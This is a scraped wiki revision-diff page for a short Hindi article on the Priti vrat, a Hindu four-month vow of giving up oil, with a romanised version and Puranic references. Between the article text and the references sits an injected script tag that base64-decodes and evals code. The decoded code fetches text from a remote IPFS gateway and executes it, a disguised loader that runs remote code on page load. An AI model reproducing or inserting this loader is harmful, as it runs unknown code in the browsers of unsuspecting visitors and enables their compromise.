Difference between revisions of "प्रीति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (प्रीतिव्रत का नाम बदलकर प्रीति व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*वह जो [[आषाढ़]] से आगे चार मासों तक तैल-त्याग और व्यंजनों के साथ भोजन दान करता है, विष्णुलोक को जाता है <ref>मत्स्यपुराण (101|6)</ref>; <ref>कृत्यकल्पतरु (40)</ref>
+
*वह जो [[आषाढ़]] से आगे चार मासों तक तैल-त्याग और व्यंजनों के साथ भोजन दान करता है, [[विष्णुलोक]] को जाता है।<ref>मत्स्यपुराण (101|6</ref>; <ref>कृत्यकल्पतरु (40</ref>
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:53, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vah jo ashadh se age char masoan tak tail-tyag aur vyanjanoan ke sath bhojan dan karata hai, vishnulok ko jata hai.[1]; [2]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. matsyapuran (101|6
  2. krityakalpataru (40

sanbandhit lekh